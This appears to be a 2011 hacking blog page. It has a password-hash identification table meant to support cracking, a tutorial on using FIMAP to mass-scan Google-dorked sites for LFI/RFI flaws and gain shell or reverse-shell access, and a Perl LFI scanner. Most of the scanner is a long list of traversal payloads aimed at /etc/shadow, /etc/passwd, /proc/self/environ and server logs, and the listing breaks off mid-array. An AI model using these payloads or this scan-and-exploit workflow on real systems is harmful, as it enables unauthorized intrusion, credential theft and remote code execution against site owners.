Tuesday, August 23, 2011

HASH TYPE REFERENCE GUIDE

I have seen numerous requests from people new and old asking what type of hash they have. There are many options out there and many algorithms used to create, so I thought it might be helpful to provide a general reference table for people to have when they need. This information can greatly increase your effectiveness in identifying and cracking password hashes. It provides a brief description of each, where you might run into them. I pulled some of this from some old dated references and added what I could. Hope this is helpful to some folks out there…


TYPE
LENGTH
Example
WHERE YOU MIGHT FIND
SUMMARY
DES(Unix)
13 Chars
MvT4cjS8IaLNQ
*nix systems
The first two chars are the actual Salt, while the rest is the actual hash. When cracking it is not necessary to split the two.
Domain Cached Credentials (DCC)
16 Chars
b474d48cdfc4974d86ef4d24904cdd91
windows PCs that are a member of a domain
Uses this algorithm to compute: MD4(MD4(Unicode($pass)).Unicode(strtolower($username)))
MD5
32 Chars (16 Bytes)
c4ca4238a0b923820dcc509a6f75849b
Used all over the place, this is by far the most common hash type
Same as the md5() function in PHP
MD5 (*nix)
34 Chars
$1$12345678$XM4P3PrKBgKNnTaqG9P0T/
*nix systems
The hash starts with the $1$ followed by the actual Salt which ends at the third $ (max of 8 chars), and everything that follows is the actual hash. It is the result of a MD5 process being called 2000 times in a row.
MD5(APR)
37 Chars
$apr1$12345678$auQSX8Mvzt.tdBi4y6Xgj.
*nix systems
This is the same as above MD5(*nix), but with a prefix of $apr$salt$hash format instead of the $1$ prefix used above.
MD5(phpBB3)
34 Chars
$H$9123456785DAERgALpsri.D9z3ht120
phpBB forums v3.x
Again, similar to the MD5(*nix) with a prefix of $H$ and no third $ to indicate the end of the salt. The prefix is followed by a random digit which is then followed by the salt (up to 8 chars) followed by the actual hash
MD5(Wordpress)
34 Chars
$P$B123456780BhGFYSlUqGyE6ErKErL01
Wordpress
Hash begins with $P$ followed by random char, then salt (max 8 chars), and the then the actual hash. MD5 loop is run 8192 times.
md5($pass.$salt)
32 Chars (16 Bytes)
6f04f0d75f6870858bae14ac0b6d9f73:1234
Used in WB News, Joomla version 1.0.13 and higher.
The “:” is a common symbol used in hashing to separate the actual hash from the salt. You need to use the Salt to crack the password hash, which may or may not need to be manually separated depending on what tools you use.
md5($salt.$pass)
32 Chars (16 Bytes)
f190ce9ac8445d249747cab7be43f7d5:12
osCommerce, AEF, Gallery and other CMS types
See above
md5(md5($pass))
32 Chars
28c8edde3d61a0411511d3b1866f0636
Used in e107, DLE, AVE, Diferior, Koobi and other CMS
You can treat this as a standard MD5 from a cracking point of view
md5(md5($pass).$salt)
32 Chars (16 Bytes)
6011527690eddca23580955c216b1fd2:wQ6
Used in vBulletin, IceBB
Uses salt, so may require special handling of salt depending on what you use for cracking, otherwise treat as normal MD5
md5(md5($salt).md5($pass))
32 Chars (16 Bytes)
81f87275dd805aa018df8befe09fe9f8:wH6_S
Used in IPB.
See above
md5(md5($salt).$pass)
32 Chars (16 Bytes)
816a14db44578f516cbaef25bd8d8296:1234
Used in MyBB.
See above
md5($salt.$pass.$salt)
32 Chars (16 Bytes)
a3bc9e11fddf4fef4deea11e33668eab:1234
Used in TBDev.
See above
md5($salt.md5($salt.$pass))
32 Chars (16 Bytes)
1d715e52285e5a6b546e442792652c8a:1234
Used in DLP
See above
MySQL <=4
16 Chars (8 Bytes)
606717496665bcba
MySQL<=4
The hash consists of two DWORDs, each not exceeding the value of 0x7fffffff
MySQL >=5
40 Chars (20 Bytes)
*E6CC90B878B948C35E92B003C792C46C58C4AF40
MySQL >=5
Uses the “SHA-1(SHA-1($pass))” algorithm to compute. The asterisk is often seen in the database but not actually used for cracking or by the programs.
RAdmin v2.x
32 Chars
(16 Bytes)
5e32cceaafed5cc80866737dfb212d7f
Used in the application Remote Administrator v2.x.
The password is padded with zeros to the length of 100 bytes, then that entire string is hashed with the MD5 algorithm.
SHA-1
40 Chars (20 Bytes)
356a192b7913b04c54574d18c28d46e6395428ab
Very commonly used in forum and CMS applications
Same as the sha1() function in PHP
sha1(strtolower($username).$pass)
40 Chars (20 Bytes)
Admin:6c7ca345f63f835cb353ff15bd6c5e052ec08e7a
Used in SMF
sha1($salt.sha1($salt.sha1($pass)))
40 Chars (20 Bytes)
cd37bfbf68d198d11d39a67158c0c9cddf34573b:1234
Used in Woltlab BB.
SHA-256(Unix)
55 Chars
$5$12345678$jBWLgeYZbSvREnuBr5s3gp13vqi
*nix systems
Prefix is $5$ followed by Salt which is up to 8 char in length followed by the actual Hash.
$5$Salt$Hash and is a result of the SHA-256 algorithm being run 5000 times.
SHA-512(Unix)
98 Chars
$6$12345678$U6Yv5E1lWn6mEESzKen42o6rbEm
*nix systems
Same as above although the prefix is $6$Salt$Hash instead of a five like above, and is result of the SHA-512 algorithm being run 5000 times.


If you are interested in an online hash type analyzer then you can check out a project that Join7 is working on. It is still in testing and the site under some construction in certain areas as he works to develop more applications and options. You can find it here: http://join7.koolserve.com/ He also has developed an automated SQL column counter as well as a Hash lookup/cracking service (which is still under major development last I checked). I hope you enjoy this share and until next time, Enjoy!

Friday, August 19, 2011

AUTOMATED LFI/RFI SCANNING & EXPLOITING WITH FIMAP

Today I am going to show you how to use a python based tool called FIMAP to perform automated LFI exploitation to gain shell access on our target site. LFI vulnerabilities are a bit like searching for SQL Injection vulnerabilities but more time consuming and these days there are fewer and fewer machines out there that are straight up vulnerable. FIMAP comes to our aid to take care of a lot of the manual effort which helps to speed things up and increase our chances of gaining remote shell access. The time it takes to manually craft the requests to test for LFI vulnerabilities is painstaking and this is why I find this tool to be extremely helpful. It automates the whole process and comes with built in exploits that actually work. It is capable of running single target scans, Google dork scans, and mass scans from a list file. It can also crawl a target site and create a list file which can be used afterwards with the mass scan mode. Here goes…

Pre-requisites:
·         Python installed on system already
·         Download copy of FIMAP here: http://code.google.com/p/fimap/downloads/list
·         Brain power & patience J

OK so assuming you already have Python installed you will download the latest version of FIMAP from its Google code home, extract to you desired location and then we can begin. You will need to open your command prompt and navigate to the extraction point (unless you added things to your global environment PATH). You can type “fimpay.py –h”  to see a quick overview of what options are available, should look like this:

It looks like a lot at first but once you review it is fairly easy to pick up on the syntax and options, as you will find most of the options and arguments are tied to whichever mode you are using. There are four basic modes: single scan, mass scan, Google scan, and Harvest mode. Single scan performs LFI check and audit against a single url. You just supply the URL to scan and it goes to work.

COMMAND: fimap.py –s –u http://target-site.com/index2.php?x=

If you are only going to be scanning a single target site then I highly suggest you run a scan using the Harvester mode first to help increase the chances of finding a vulnerable link. You can simply point FIMAP at the root directory of a site in Harvester mode and it will generate an output file for you to feed into the Mass scan. It looks like this:

COMMAND: fimap.py –H –u http://target-site.com/ -w output.txt
NOTE: you can define the crawl depth by adding the “-d <number of pages to crawl>” flag, as the default is set to 1

COMMAND: fimap.py –H –u http://target-site.com/ -d 3 –w output.txt

Now that we have our output file we can follow things up by switching to the Mass scan mode and audit all of the links we found when we used the Harvester mode. You just point it to the output.txt file from above steps and let it do its thing, like so:

COMMAND: fimap.py –m –l /path/to/list/output.txt


If you prefer to run some large scans using Google and your favorite Google dorks you can switch modes and use the following syntax:

COMMAND: fimap.py –g –q inurl:index2.php?x=


It will run similar to the mass scan mode until it reaches the end of the results…
NOTE: You can further define the Google scan parameters by defining the time in between Google requests using “--googlesleep=<time>” and the pages to read for results from using “-p <page number>”. If you define the number of pages to return you can also add the number of results per page to use using “--results=<10,25,50,100>”, with 100 being the default value. The full syntax would look like this:

COMMAND: fimap.py –g –q inurl:index2.php?x= --googlesleep=5000 –p 15 –results=50

Now once you have run your scans you will be wondering where the results are stored. You can find them in two files, which you will need to search for on your system: fimap_results (xml) and fimap-log (txt). These two files contain the stored results from all of your scans. The location depends on what type of system you are using so just use the run box or the locate command to find them on your system. You can also type “-x” to see a list of possible targets to perform exploitation attempts against in a nice easy to follow interactive session:

COMMAND: fimap.py –x


 
Simply choose the desired target by entering the number provided. Once a target is selected you will have the opportunity of choosing which vulnerable link to try to exploit. It looks like this:

Once you choose the link to exploit you will have the chance to choose the final payload to use. The default options consist of an integrated shell on the target site or a reverse shell for which you can connect to using NetCat on your local system. The fimap shell is not an interactive shell so you will not be able to use services like SSH but you can use it to gain foothold for further escalation and rooting. Choose your payload, connect, and enjoy. Here is end results from successful exploit using the fimap shell:

You can also play with the configuration file so that you can add some additional features. Most notably you can add support to test for RFI vulnerabilities as well. You simply add you hosting details for your shell of choice into the “config.py” file, save, and then perform quick test to see if it is working. Here are the lines that need to be edited (editable fields in RED); I suggest using the FTP mode if you have the ability to host your shell somewhere:

# FTP Mode
settings["dynamic_rfi"]["ftp"] = {}
settings["dynamic_rfi"]["ftp"]["ftp_host"] = None
settings["dynamic_rfi"]["ftp"]["ftp_user"] = None
settings["dynamic_rfi"]["ftp"]["ftp_pass"] = None
settings["dynamic_rfi"]["ftp"]["ftp_path"] = None # A non existing file without suffix. Example: /home/imax/public_html/payload
settings["dynamic_rfi"]["ftp"]["http_map"] = None # The mapped HTTP path of the file. Example: http://localhost/~imax/payload

# Local Mode
settings["dynamic_rfi"]["local"] = {}
settings["dynamic_rfi"]["local"]["local_path"] = None   # A non existing file on your filesystem without prefix which is reachable by http. Example: /var/www/payload
settings["dynamic_rfi"]["local"]["http_map"]   = None   # The http url of the file without prefix where the file is reachable from the web. Example: http://localhost/payload

Here is the command to test your RFI configuration to see if it will work for exploiting vulnerable links:

COMMAND: fimap.py –test-rfi

This covers the basic usage for FIMAP. This tool is still under development so I encourage you to follow the project for more updates to come. If you want to truly learn how LFI works, then I encourage you to try this out manually after you have found a few with the assistance of the tool. I have also included a modified Perl script below which does some more thorough testing for file presence but is not nearly as full featured, nor is it the quietest tool. Please use responsibly and until next time, Enjoy!


BONUS PERL LFI SCRIPT:
Save the below as “file.pl” and then run using “perl file.pl” and then just enter your target site…

#!/usr/bin/perl
#modified by: Hood3dRob1n
use LWP::UserAgent;
use HTTP::Request;
system('clear','cls');
print "=======================================================\n";
print "=                                                                                                                    =\n";
print "=                                         LFI_scanner v 0.1.5                                           =\n";
print "=                                    ~[ HR Updated Version ]~                                     =\n";
print "=                                                                                                                   =\n";
print "=                input the site: www.memek.com/index.php?id=                        =\n";
print "=                                                                                                                   =\n";
print "=====================================================\n\n";
print '>';chomp($link = <STDIN>);
if($link !~ /http:\/\//) { $link = "http://$link"; }
#httpd type scan
print "\n>press [enter] to check the version of httpd[...]\n";
$httpd =<STDIN>;
$host = $link;
$useragent = LWP::UserAgent->new;
$resp = $useragent->head($host);
print $resp->headers_as_string;
print "\n>press [enter] to check the vulnerability in lfi[...]\n";
$start =<STDIN>;
@vuls = ('/etc/passwd',
'../etc/passwd',
'../../etc/passwd',
'../../../etc/passwd',
'../../../../etc/passwd',
'../../../../../etc/passwd',
'../../../../../../etc/passwd',
'../../../../../../../etc/passwd',
'../../../../../../../../etc/passwd',
'../../../../../../../../../etc/passwd',
'../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../etc/passwd',
'../etc/passwd%00',
'../../etc/passwd%00',
'../../../etc/passwd%00',
'../../../../etc/passwd%00',
'../../../../../etc/passwd%00',
'../../../../../../etc/passwd%00',
'../../../../../../../etc/passwd%00',
'../../../../../../../../etc/passwd%00',
'../../../../../../../../../etc/passwd%00',
'../../../../../../../../../../etc/passwd%00',
'../../../../../../../../../../../etc/passwd%00',
'/proc/self/environ',
'../proc/self/environ',
'../../proc/self/environ',
'../../../proc/self/environ',
'../../../../proc/self/environ',
'../../../../../proc/self/environ',
'../../../../../../proc/self/environ',
'../../../../../../../proc/self/environ',
'../../../../../../../../proc/self/environ',
'../../../../../../../../../proc/self/environ',
'../../../../../../../../../../proc/self/environ',
'../../../../../../../../../../../proc/self/environ',
'/proc/self/environ%00',
'../proc/self/environ%00',
'../../proc/self/environ%00',
'../../../proc/self/environ%00',
'../../../../proc/self/environ%00',
'../../../../../proc/self/environ%00',
'../../../../../../proc/self/environ%00',
'../../../../../../../proc/self/environ%00',
'../../../../../../../../proc/self/environ%00',
'../../../../../../../../../proc/self/environ%00',
'../../../../../../../../../../proc/self/environ%00',
'../../../../../../../../../../../proc/self/environ%00',
'/etc/group',
'../etc/group',
'../../etc/group',
'../../../etc/group',
'../../../../etc/group',
'../../../../../etc/group',
'../../../../../../etc/group',
'../../../../../../../etc/group',
'../../../../../../../../etc/group',
'../../../../../../../../../etc/group',
'../../../../../../../../../../etc/group',
'../../../../../../../../../../../etc/group',
'/etc/group%00',
'../etc/group%00',
'../../etc/group%00',
'../../../etc/group%00',
'../../../../etc/group%00',
'../../../../../etc/group%00',
'../../../../../../etc/group%00',
'../../../../../../../etc/group%00',
'../../../../../../../../etc/group%00',
'../../../../../../../../../etc/group%00',
'../../../../../../../../../../etc/group%00',
'../../../../../../../../../../../etc/group%00',
'/etc/security/group',
'../etc/security/group',
'../../etc/security/group',
'../../../etc/security/group',
'../../../../etc/security/group',
'../../../../../etc/security/group',
'../../../../../../etc/security/group',
'../../../../../../../etc/security/group',
'../../../../../../../../etc/security/group',
'../../../../../../../../../etc/security/group',
'../../../../../../../../../../etc/security/group',
'../../../../../../../../../../../etc/security/group',
'/etc/security/group%00',
'../etc/security/group%00',
'../../etc/security/group%00',
'../../../etc/security/group%00',
'../../../../etc/security/group%00',
'../../../../../etc/security/group%00',
'../../../../../../etc/security/group%00',
'../../../../../../../etc/security/group%00',
'../../../../../../../../etc/security/group%00',
'../../../../../../../../../etc/security/group%00',
'../../../../../../../../../../etc/security/group%00',
'../../../../../../../../../../../etc/security/group%00',
'/etc/user',
'../etc/user',
'../../etc/user',
'../../../etc/user',
'../../../../etc/user',
'../../../../../etc/user',
'../../../../../../etc/user',
'../../../../../../../etc/user',
'../../../../../../../../etc/user',
'../../../../../../../../../etc/user',
'../../../../../../../../../../etc/user',
'../../../../../../../../../../../etc/user',
'/etc/user%00',
'../etc/user%00',
'../../etc/user%00',
'../../../etc/user%00',
'../../../../etc/user%00',
'../../../../../etc/user%00',
'../../../../../../etc/user%00',
'../../../../../../../etc/user%00',
'../../../../../../../../etc/user%00',
'../../../../../../../../../etc/user%00',
'../../../../../../../../../../etc/user%00',
'../../../../../../../../../../../etc/user%00',
'/etc/shadow',
'../etc/shadow',
'../../etc/shadow',
'../../../etc/shadow',
'../../../../etc/shadow',
'../../../../../etc/shadow',
'../../../../../../etc/shadow',
'../../../../../../../etc/shadow',
'../../../../../../../../etc/shadow',
'../../../../../../../../../etc/shadow',
'../../../../../../../../../../etc/shadow',
'../../../../../../../../../../../etc/shadow',
'/etc/shadow%00',
'../etc/shadow%00',
'../../etc/shadow%00',
'../../../etc/shadow%00',
'../../../../etc/shadow%00',
'../../../../../etc/shadow%00',
'../../../../../../etc/shadow%00',
'../../../../../../../etc/shadow%00',
'../../../../../../../../etc/shadow%00',
'../../../../../../../../../etc/shadow%00',
'../../../../../../../../../../etc/shadow%00',
'../../../../../../../../../../../etc/shadow%00',
'/etc/security/passwd',
'../etc/security/passwd',
'../../etc/security/passwd',
'../../../etc/security/passwd',
'../../../../etc/security/passwd',
'../../../../../etc/security/passwd',
'../../../../../../etc/security/passwd',
'../../../../../../../etc/security/passwd',
'../../../../../../../../etc/security/passwd',
'../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../../etc/security/passwd',
'/etc/security/passwd%00',
'../etc/security/passwd%00',
'../../etc/security/passwd%00',
'../../../etc/security/passwd%00',
'../../../../etc/security/passwd%00',
'../../../../../etc/security/passwd%00',
'../../../../../../etc/security/passwd%00',
'../../../../../../../etc/security/passwd%00',
'../../../../../../../../etc/security/passwd%00',
'../../../../../../../../../etc/security/passwd%00',
'../../../../../../../../../../etc/security/passwd%00',
'../../../../../../../../../../../etc/security/passwd%00',
'/etc/security/user',
'../etc/security/user',
'../../etc/security/user',
'../../../etc/security/user',
'../../../../etc/security/user',
'../../../../../etc/security/user',
'../../../../../../etc/security/user',
'../../../../../../../etc/security/user',
'../../../../../../../../etc/security/user',
'../../../../../../../../../etc/security/user',
'../../../../../../../../../../etc/security/user',
'../../../../../../../../../../../etc/security/user',
'/etc/security/user%00',
'../etc/security/user%00',
'../../etc/security/user%00',
'../../../etc/security/user%00',
'../../../../etc/security/user%00',
'../../../../../etc/security/user%00',
'../../../../../../etc/security/user%00',
'../../../../../../../etc/security/user%00',
'../../../../../../../../etc/security/user%00',
'../../../../../../../../../etc/security/user%00',
'../../../../../../../../../../etc/security/user%00',
'../../../../../../../../../../../etc/security/user%00',
'/etc/security/environ',
'../etc/security/environ',
'../../etc/security/environ',
'../../../etc/security/environ',
'../../../../etc/security/environ',
'../../../../../etc/security/environ',
'../../../../../../etc/security/environ',
'../../../../../../../etc/security/environ',
'../../../../../../../../etc/security/environ',
'../../../../../../../../../etc/security/environ',
'../../../../../../../../../../etc/security/environ',
'../../../../../../../../../../../etc/security/environ',
'/etc/security/environ%00',
'../etc/security/environ%00',
'../../etc/security/environ%00',
'../../../etc/security/environ%00',
'../../../../etc/security/environ%00',
'../../../../../etc/security/environ%00',
'../../../../../../etc/security/environ%00',
'../../../../../../../etc/security/environ%00',
'../../../../../../../../etc/security/environ%00',
'../../../../../../../../../etc/security/environ%00',
'../../../../../../../../../../etc/security/environ%00',
'../../../../../../../../../../../etc/security/environ%00',
'/etc/security/limits',
'../etc/security/limits',
'../../etc/security/limits',
'../../../etc/security/limits',
'../../../../etc/security/limits',
'../../../../../etc/security/limits',
'../../../../../../etc/security/limits',
'../../../../../../../etc/security/limits',
'../../../../../../../../etc/security/limits',
'../../../../../../../../../etc/security/limits',
'../../../../../../../../../../etc/security/limits',
'../../../../../../../../../../../etc/security/limits',
'/etc/security/limits%00',
'../etc/security/limits%00',
'../../etc/security/limits%00',
'../../../etc/security/limits%00',
'../../../../etc/security/limits%00',
'../../../../../etc/security/limits%00',
'../../../../../../etc/security/limits%00',
'../../../../../../../etc/security/limits%00',
'../../../../../../../../etc/security/limits%00',
'../../../../../../../../../etc/security/limits%00',
'../../../../../../../../../../etc/security/limits%00',
'../../../../../../../../../../../etc/security/limits%00',
'/usr/lib/security/mkuser.default',
'../usr/lib/security/mkuser.default',
'../../usr/lib/security/mkuser.default',
'../../../usr/lib/security/mkuser.default',
'../../../../usr/lib/security/mkuser.default',
'../../../../../usr/lib/security/mkuser.default',
'../../../../../../usr/lib/security/mkuser.default',
'../../../../../../../usr/lib/security/mkuser.default',
'../../../../../../../../usr/lib/security/mkuser.default',
'../../../../../../../../../usr/lib/security/mkuser.default',
'../../../../../../../../../../usr/lib/security/mkuser.default',
'../../../../../../../../../../../usr/lib/security/mkuser.default',
'/usr/lib/security/mkuser.default%00',
'../usr/lib/security/mkuser.default%00',
'../../usr/lib/security/mkuser.default%00',
'../../../usr/lib/security/mkuser.default%00',
'../../../../usr/lib/security/mkuser.default%00',
'../../../../../usr/lib/security/mkuser.default%00',
'../../../../../../usr/lib/security/mkuser.default%00',
'../../../../../../../usr/lib/security/mkuser.default%00',
'../../../../../../../../usr/lib/security/mkuser.default%00',
'../../../../../../../../../usr/lib/security/mkuser.default%00',
'../../../../../../../../../../usr/lib/security/mkuser.default%00',
'../../../../../../../../../../../usr/lib/security/mkuser.default%00',
'/apache/logs/access.log',
'../apache/logs/access.log',
'../../apache/logs/access.log',
'../../../apache/logs/access.log',
'../../../../apache/logs/access.log',
'../../../../../apache/logs/access.log',
'../../../../../../apache/logs/access.log',
'../../../../../../../apache/logs/access.log',
'../../../../../../../../apache/logs/access.log',
'../../../../../../../../../apache/logs/access.log',
'../../../../../../../../../../apache/logs/access.log',
'../../../../../../../../../../../apache/logs/access.log',
'/apache/logs/access.log%00',
'../apache/logs/access.log%00',
'../../apache/logs/access.log%00',
'../../../apache/logs/access.log%00',
'../../../../apache/logs/access.log%00',
'../../../../../apache/logs/access.log%00',
'../../../../../../apache/logs/access.log%00',
'../../../../../../../apache/logs/access.log%00',
'../../../../../../../../apache/logs/access.log%00',
'../../../../../../../../../apache/logs/access.log%00',
'../../../../../../../../../../apache/logs/access.log%00',
'../../../../../../../../../../../apache/logs/access.log%00',
'/apache/logs/error.log',
'../apache/logs/error.log',
'../../apache/logs/error.log',
'../../../apache/logs/error.log',
'../../../../apache/logs/error.log',
'../../../../../apache/logs/error.log',
'../../../../../../apache/logs/error.log',
'../../../../../../../apache/logs/error.log',
'../../../../../../../../apache/logs/error.log',
'../../../../../../../../../apache/logs/error.log',
'../../../../../../../../../../apache/logs/error.log',
'../../../../../../../../../../../apache/logs/error.log',
'/apache/logs/error.log%00',
'../apache/logs/error.log%00',
'../../apache/logs/error.log%00',
'../../../apache/logs/error.log%00',
'../../../../apache/logs/error.log%00',
'../../../../../apache/logs/error.log%00',
'../../../../../../apache/logs/error.log%00',
'../../../../../../../apache/logs/error.log%00',
'../../../../../../../../apache/logs/error.log%00',
'../../../../../../../../../apache/logs/error.log%00',
'../../../../../../../../../../apache/logs/error.log%00',
'../../../../../../../../../../../apache/logs/error.log%00',
'/etc/httpd/logs/acces_log',
'../etc/httpd/logs/acces_log',
'../../etc/httpd/logs/acces_log',
'../../../etc/httpd/logs/acces_log',
'../../../../etc/httpd/logs/acces_log',
'../../../../../etc/httpd/logs/acces_log',
'../../../../../../etc/httpd/logs/acces_log',
'../../../../../../../etc/httpd/logs/acces_log',
'../../../../../../../../etc/httpd/logs/acces_log',
'../../../../../../../../../etc/httpd/logs/acces_log',
'../../../../../../../../../../etc/httpd/logs/acces_log',
'../../../../../../../../../../../etc/httpd/logs/acces_log',
'/etc/httpd/logs/acces_log%00',
'../etc/httpd/logs/acces_log%00',
'../../etc/httpd/logs/acces_log%00',
'../../../etc/httpd/logs/acces_log%00',
'../../../../etc/httpd/logs/acces_log%00',
'../../../../../etc/httpd/logs/acces_log%00',
'../../../../../../etc/httpd/logs/acces_log%00',
'../../../../../../../etc/httpd/logs/acces_log%00',
'../../../../../../../../etc/httpd/logs/acces_log%00',
'../../../../../../../../../etc/httpd/logs/acces_log%00',
'../../../../../../../../../../etc/httpd/logs/acces_log%00',
'../../../../../../../../../../../etc/httpd/logs/acces_log%00',
'/etc/httpd/logs/error_log',
'../etc/httpd/logs/error_log',
'../../etc/httpd/logs/error_log',
'../../../etc/httpd/logs/error_log',
'../../../../etc/httpd/logs/error_log',
'../../../../../etc/httpd/logs/error_log',
'../../../../../../etc/httpd/logs/error_log',
'../../../../../../../etc/httpd/logs/error_log',
'../../../../../../../../etc/httpd/logs/error_log',
'../../../../../../../../../etc/httpd/logs/error_log',
'../../../../../../../../../../etc/httpd/logs/error_log',
'../../../../../../../../../../../etc/httpd/logs/error_log',
'/etc/httpd/logs/error_log%00',
'../etc/httpd/logs/error_log%00',
'../../etc/httpd/logs/error_log%00',
'../../../etc/httpd/logs/error_log%00',
'../../../../etc/httpd/logs/error_log%00',
'../../../../../etc/httpd/logs/error_log%00',
'../../../../../../etc/httpd/logs/error_log%00',
'../../../../../../../etc/httpd/logs/error_log%00',
'../../../../../../../../etc/httpd/logs/error_log%00',
'../../../../../../../../../etc/httpd/logs/error_log%00',
'../../../../../../../../../../etc/httpd/logs/error_log%00',
'../../../../../../../../../../../etc/httpd/logs/error_log%00',
'/var/www/logs/access_log',
'../var/www/logs/access_log',
'../../var/www/logs/access_log',
'../../../var/www/logs/access_log',
'../../../../var/www/logs/access_log',
'../../../../../var/www/logs/access_log',
'../../../../../../var/www/logs/access_log',
'../../../../../../../var/www/logs/access_log',
'../../../../../../../../var/www/logs/access_log',
'../../../../../../../../../var/www/logs/access_log',
'../../../../../../../../../../var/www/logs/access_log',
'../../../../../../../../../../../var/www/logs/access_log',
'/var/www/logs/access_log%00',
'../var/www/logs/access_log%00',
'../../var/www/logs/access_log%00',
'../../../var/www/logs/access_log%00',
'../../../../var/www/logs/access_log%00',
'../../../../../var/www/logs/access_log%00',
'../../../../../../var/www/logs/access_log%00',
'../../../../../../../var/www/logs/access_log%00',
'../../../../../../../../var/www/logs/access_log%00',
'../../../../../../../../../var/www/logs/access_log%00',
'../../../../../../../../../../var/www/logs/access_log%00',
'../../../../../../../../../../../var/www/logs/access_log%00',
'/var/www/logs/error_log',
'../var/www/logs/error_log',
'../../var/www/logs/error_log',
'../../../var/www/logs/error_log',
'../../../../var/www/logs/error_log',
'../../../../../var/www/logs/error_log',
'../../../../../../var/www/logs/error_log',
'../../../../../../../var/www/logs/error_log',
'../../../../../../../../var/www/logs/error_log',
'../../../../../../../../../var/www/logs/error_log',
'../../../../../../../../../../var/www/logs/error_log',
'../../../../../../../../../../../var/www/logs/error_log',
'/var/www/logs/error_log%00',
'../var/www/logs/error_log%00',
'../../var/www/logs/error_log%00',
'../../../var/www/logs/error_log%00',
'../../../../var/www/logs/error_log%00',
'../../../../../var/www/logs/error_log%00',
'../../../../../../var/www/logs/error_log%00',
'../../../../../../../var/www/logs/error_log%00',
'../../../../../../../../var/www/logs/error_log%00',
'../../../../../../../../../var/www/logs/error_log%00',
'../../../../../../../../../../var/www/logs/error_log%00',
'../../../../../../../../../../../var/www/logs/error_log%00',
'/usr/local/apache/logs/access_ log',
'../usr/local/apache/logs/access_ log',
'../../usr/local/apache/logs/access_ log',
'../../../usr/local/apache/logs/access_ log',
'../../../../usr/local/apache/logs/access_ log',
'../../../../../usr/local/apache/logs/access_ log',
'../../../../../../usr/local/apache/logs/access_ log',
'../../../../../../../usr/local/apache/logs/access_ log',
'../../../../../../../../usr/local/apache/logs/access_ log',
'../../../../../../../../../usr/local/apache/logs/access_ log',
'../../../../../../../../../../usr/local/apache/logs/access_ log',
'../../../../../../../../../../../usr/local/apache/logs/access_ log',
'/usr/local/apache/logs/access_ log%00',
'../usr/local/apache/logs/access_ log%00',
'../../usr/local/apache/logs/access_ log%00',
'../../../usr/local/apache/logs/access_ log%00',
'../../../../usr/local/apache/logs/access_ log%00',
'../../../../../usr/local/apache/logs/access_ log%00',
'../../../../../../usr/local/apache/logs/access_ log%00',
'../../../../../../../usr/local/apache/logs/access_ log%00',
'../../../../../../../../usr/local/apache/logs/access_ log%00',
'../../../../../../../../../usr/local/apache/logs/access_ log%00',
'../../../../../../../../../../usr/local/apache/logs/access_ log%00',
'../../../../../../../../../../../usr/local/apache/logs/access_ log%00',
'/usr/local/apache/logs/error_ log',
'../usr/local/apache/logs/error_ log',
'../../usr/local/apache/logs/error_ log',
'../../../usr/local/apache/logs/error_ log',
'../../../../usr/local/apache/logs/error_ log',
'../../../../../usr/local/apache/logs/error_ log',
'../../../../../../usr/local/apache/logs/error_ log',
'../../../../../../../usr/local/apache/logs/error_ log',
'../../../../../../../../usr/local/apache/logs/error_ log',
'../../../../../../../../../usr/local/apache/logs/error_ log',
'../../../../../../../../../../usr/local/apache/logs/error_ log',
'../../../../../../../../../../../usr/local/apache/logs/error_ log',
'/usr/local/apache/logs/error_ log%00',
'../usr/local/apache/logs/error_ log%00',
'../../usr/local/apache/logs/error_ log%00',
'../../../usr/local/apache/logs/error_ log%00',
'../../../../usr/local/apache/logs/error_ log%00',
'../../../../../usr/local/apache/logs/error_ log%00',
'../../../../../../usr/local/apache/logs/error_ log%00',
'../../../../../../../usr/local/apache/logs/error_ log%00',
'../../../../../../../../usr/local/apache/logs/error_ log%00',
'../../../../../../../../../usr/local/apache/logs/error_ log%00',
'../../../../../../../../../../usr/local/apache/logs/error_ log%00',
'../../../../../../../../../../../usr/local/apache/logs/error_ log%00',
'/var/log/apache/access_log',
'../var/log/apache/access_log',
'../../var/log/apache/access_log',
'../../../var/log/apache/access_log',
'../../../../var/log/apache/access_log',
'../../../../../var/log/apache/access_log',
'../../../../../../var/log/apache/access_log',
'../../../../../../../var/log/apache/access_log',
'../../../../../../../../var/log/apache/access_log',
'../../../../../../../../../var/log/apache/access_log',
'../../../../../../../../../../var/log/apache/access_log',
'../../../../../../../../../../../var/log/apache/access_log',
'/var/log/apache/access_log%00',
'../var/log/apache/access_log%00',
'../../var/log/apache/access_log%00',
'../../../var/log/apache/access_log%00',
'../../../../var/log/apache/access_log%00',
'../../../../../var/log/apache/access_log%00',
'../../../../../../var/log/apache/access_log%00',
'../../../../../../../var/log/apache/access_log%00',
'../../../../../../../../var/log/apache/access_log%00',
'../../../../../../../../../var/log/apache/access_log%00',
'../../../../../../../../../../var/log/apache/access_log%00',
'../../../../../../../../../../../var/log/apache/access_log%00',
'/var/log/apache/error_log',
'../var/log/apache/error_log',
'../../var/log/apache/error_log',
'../../../var/log/apache/error_log',
'../../../../var/log/apache/error_log',
'../../../../../var/log/apache/error_log',
'../../../../../../var/log/apache/error_log',
'../../../../../../../var/log/apache/error_log',
'../../../../../../../../var/log/apache/error_log',
'../../../../../../../../../var/log/apache/error_log',
'../../../../../../../../../../var/log/apache/error_log',
'../../../../../../../../../../../var/log/apache/error_log',
'/var/log/apache/error_log%00',
'../var/log/apache/error_log%00',
'../../var/log/apache/error_log%00',
'../../../var/log/apache/error_log%00',
'../../../../var/log/apache/error_log%00',
'../../../../../var/log/apache/error_log%00',
'../../../../../../var/log/apache/error_log%00',
'../../../../../../../var/log/apache/error_log%00',
'../../../../../../../../var/log/apache/error_log%00',
'../../../../../../../../../var/log/apache/error_log%00',
'../../../../../../../../../../var/log/apache/error_log%00',
'../../../../../../../../../../../var/log/apache/error_log%00',
'/var/log/apache2/error_log',
'../var/log/apache2/error_log',
'../../var/log/apache2/error_log',
'../../../var/log/apache2/error_log',
'../../../../var/log/apache2/error_log',
'../../../../../var/log/apache2/error_log',
'../../../../../../var/log/apache2/error_log',
'../../../../../../../var/log/apache2/error_log',
'../../../../../../../../var/log/apache2/error_log',
'../../../../../../../../../var/log/apache2/error_log',
'../../../../../../../../../../var/log/apache2/error_log',
'../../../../../../../../../../../var/log/apache2/error_log',
'/var/log/apache2/error_log%00',
'../var/log/apache2/error_log%00',
'../../var/log/apache2/error_log%00',
'../../../var/log/apache2/error_log%00',
'../../../../var/log/apache2/error_log%00',
'../../../../../var/log/apache2/error_log%00',
